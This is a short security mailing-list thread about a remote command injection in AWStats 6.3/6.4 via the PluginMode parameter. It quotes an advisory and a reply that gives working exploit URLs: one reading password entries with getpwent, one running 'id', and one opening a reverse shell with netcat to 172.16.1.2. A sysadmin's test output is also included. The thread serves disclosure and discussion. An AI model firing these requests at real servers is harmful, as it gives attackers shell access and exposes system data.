awstats 6.3 from source:
request:
http://www.site.org/awstats/cgi-bin/awstats.pl?&PluginMode=:print+system('id')+;
output:
****************
Error: Can't locate object method "BuildFullHTMLOutput_print" via package "systemid" (perhaps you forgot to load "systemid"?) at (eval 1) line 1.
Setup ('/etc/awstats/awstats.www.site.org.conf' file, web server or permissions) may be wrong.
Check config file, permissions and AWStats documentation (in 'docs' directory).
***************
regards, jamie
Ondra Holecek wrote:
GHC@xxxxxxxxxxxxxxxxxxxxx wrote: | | /*==========================================*/ | // GHC -> AWStats <- ADVISORY | \\ PRODUCT: AWStats | // VERSION: <= 6.3 | \\ URL: http://awstats.sourceforge.net/ | // VULNERABILITY CLASS: Multiple vulnerabilities | \\ RISK: high | /*==========================================*/
[...]
|
| PluginMode=:print+getpwent
|
| And the $function becomes 'BuildFullHTMLOutput_:print getpwent()'.
| This will satisfy eval() requirements., and :print getpwent() is executed.
|
|
http://www.lan.server/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+getpwent
| | Sanitazing limits user's input, but there is no filtration for call sympols '()'.
no, user is not limited, he can execute ANY command if he add ; at the end of the command, try this
awstats.pl?&PluginMode=:print+system('id')+;
or even this
awstats.pl?&PluginMode=:print+system('nc+172.16.1.2+3000+-e+/bin/sh')+;
Ondra
--
James Pratt Unix Systems Administrator Norwich University http://www.norwich.edu/it <jpratt@xxxxxxxxxxx> | ph. (802)485-2532